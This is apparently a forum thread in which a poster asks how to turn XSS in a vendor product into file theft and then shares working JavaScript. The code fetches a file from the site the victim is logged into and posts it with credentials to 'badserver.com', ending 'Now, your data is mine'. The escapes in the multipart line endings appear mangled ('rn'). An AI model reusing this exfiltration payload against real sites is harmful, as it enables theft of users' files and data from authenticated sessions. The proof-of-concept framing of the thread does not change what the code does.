xss exploit, proof of concept

I work with a specific large vendor product and I am trying to do a proof of concept that with a bit if XSS, really bad things can happen.

Now, is this possible:

Lets say I am using IE/Chrome, the site the user is browsing has a directory of files.

Is it possible using JS to take one of those files and upload to an external site?

I’ve got all the pieces done I need to besides the download / upload mechanism.

Can this be done with FormData? (Honestly, I have barely enough time to keep up with the latest JS crap)

And I hope everyone realizes this is me asking and not a script kiddie… lmao

I’ve got an AJAX request going to download the file, but I guess the part where it falls apart is the uploading to an external site…

In theory, yes. It can be accomplished by iframes and hitting a service that can upload files.

If you can get the file downloaded, then you can upload it via AJAX again if the web server you’re uploading to has CORS support. If not you can do what analytics scripts do and just make a request for a file on the server and append the file information to the query string. You redirect requests for the file to a script that can then take the query string and store it in a database or on the filesystem.

fuck this was easy thanks to CORS. This assumes the JS file is on the server you want files from, an example file below:

function testExploit()
{
	var url = 'http://domain-authenticated-with-and-browsing.com/file.txt';
			
    // Downloads the file
	$.ajax({
		type: 'GET',
		url: url ,
		success: function(data){
            // Thanks for your data, now i will upload it
		    fileUpload('http://badserver.com/uploadurl', data, 'file.txt');
		}
	});

}
		

		
function fileUpload(url, fileData, fileName) {
	var fileSize = fileData.length,
		boundary = "xxxxxxxxx",
		xhr = new XMLHttpRequest();
	xhr.withCredentials = "true"; 
		    
	xhr.open("POST", url, true);
		    // simulate a file MIME POST request.
	xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
		    
	var body = "--" + boundary + "rn";
	body += 'Content-Disposition: form-data; name="contents"; filename="' + fileName + '"rn';
	body += "Content-Type: application/octet-streamrnrn";
	body += fileData + "rn";
	body += "--" + boundary + "--";
		    
	xhr.send(body);
	return true;
}

Now, your data is mine